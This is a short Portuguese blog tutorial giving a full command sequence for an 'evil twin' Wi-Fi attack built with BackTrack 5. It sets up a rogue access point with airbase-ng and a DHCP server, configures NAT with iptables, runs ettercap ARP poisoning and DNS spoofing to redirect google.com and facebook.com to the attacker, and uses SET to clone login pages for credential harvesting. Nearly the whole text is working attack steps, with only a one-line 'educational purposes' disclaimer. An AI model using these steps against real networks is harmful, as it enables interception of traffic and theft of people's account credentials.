O ataque abaixo foi 100% arquitetado à partir do BackTrack 5.
Devido ao nível de complexidade, não é aconselhado para usuários com pouco conhecimento em linux.
Não esqueça de trocar os ip’s, canais, interfaces, mascaras e demais informações do exemplo abaixo para as de sua rede.
ATENÇÃO: apenas para fins educacionais!
– abra um shell e digite:
apt-get install dhcp3-server -y
– abra o arquivo:
kwrite /etc/dhcp3/dhcpd.conf
– apaque tudo do arquivo e coloque (troque os ips):
ddns-update-style ad-hoc; default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 200.204.0.10; range 192.168.1.2 192.168.1.253;
}
– abra um shell e digite (troque a interface, canal e AP):
airmon-ng; airmon-ng start wlan0;
airbase-ng -e “TEST_AP” -c 9 -v mon0;
– abra outro shell e digite (troque os ips e mascaras):
ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0;
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1;
echo > ‘/var/lib/dhcp3/dhcpd.leases’ mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd; dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0; dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0; ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid;
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0;
– no mesmo shell (troque os ips e interfaces):
iptables –flush; iptables –table nat –flush; iptables –delete-chain; iptables –table nat –delete-chain; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE; iptables –append FORWARD –in-interface at0 -j ACCEPT;
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 192.168.0.1;
– abra um shell e digite:
airodump-ng mon0
– abra um shell e digite:
kwrite /usr/local/share/ettercap/etter.dns
– apague tudo e coloque (troque os dns’s e ip’s para os que desejar)
*.google.com A 192.168.0.100
*.facebook.com A 192.168.0.100
– salve o arquivo e no shell digite (troque os ips e interfaces):
ettercap -T -M ARP -P dns_spoof -i at0 /192.168.1.1/ //
Use o set para clonar a página especificada no arquivo etter.dns (ex:facebook.com) .
Funciona com qualquer ataque (java applet, credential harvester, etc…).
Leandro Silva – www.casasbrilar.com.br
Um site de variedades.